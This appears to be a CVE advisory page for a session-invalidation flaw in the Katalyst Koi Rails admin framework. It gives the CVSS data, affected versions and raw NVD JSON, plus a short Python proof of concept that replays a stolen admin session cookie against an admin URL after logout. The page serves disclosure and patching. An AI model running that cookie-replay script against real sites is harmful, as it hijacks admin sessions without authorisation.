CVE-2026-44511

Description

Katalyst Koi is a framework for building Rails admin functionality. Prior to 4.20.0 and 5.6.0, admin session cookies were not invalidated when an admin user logged out. An attacker with access to a valid admin session cookie could continue to access admin functionality after logout, until the cookie expired or session secrets were rotated. This vulnerability is fixed in 4.20.0 and 5.6.0.

CVSS Details

CVSS Score

7.4

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

No configuration data available.

Katalyst Koi < 4.20.0

Katalyst Koi < 5.6.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# Proof of Concept: Session Cookie Reuse after Logout
import requests

def check_session_reuse(target_url, stolen_cookie):
    """
    Attempts to access the admin panel using a stolen cookie
    after the legitimate user has logged out.
    """
    headers = {
        "User-Agent": "CVE-2026-44511-PoC/1.0",
        "Cookie": stolen_cookie
    }

    try:
        response = requests.get(target_url, headers=headers, timeout=10)
        
        # Check if response indicates successful admin access
        if response.status_code == 200 and ("admin" in response.text.lower() or "dashboard" in response.text.lower()):
            return "[+] Vulnerability Confirmed: Admin session is still active after logout."
        else:
            return "[-] Session invalid or access denied."
            
    except Exception as e:
        return f"[!] Error occurred: {str(e)}"

if __name__ == "__main__":
    # Replace with actual target and captured cookie
    target = "http://localhost:3000/admin"
    cookie = "_katalyst_koi_session=eyJfY3NyZiI6..."
    print(check_session_reuse(target, cookie))

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-44511
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-44511
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-44511/
[4] VulDB https://vuldb.com/cve/CVE-2026-44511
[5] https://github.com/katalyst/koi/security/advisories/GHSA-4cx3-3c38-j9vv

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-44511", "sourceIdentifier": "[email protected]", "published": "2026-05-14T17:16:22.760", "lastModified": "2026-05-14T18:19:25.260", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Katalyst Koi is a framework for building Rails admin functionality. Prior to 4.20.0 and 5.6.0, admin session cookies were not invalidated when an admin user logged out. An attacker with access to a valid admin session cookie could continue to access admin functionality after logout, until the cookie expired or session secrets were rotated. This vulnerability is fixed in 4.20.0 and 5.6.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-613"}]}], "references": [{"url": "https://github.com/katalyst/koi/security/advisories/GHSA-4cx3-3c38-j9vv", "source": "[email protected]"}]}}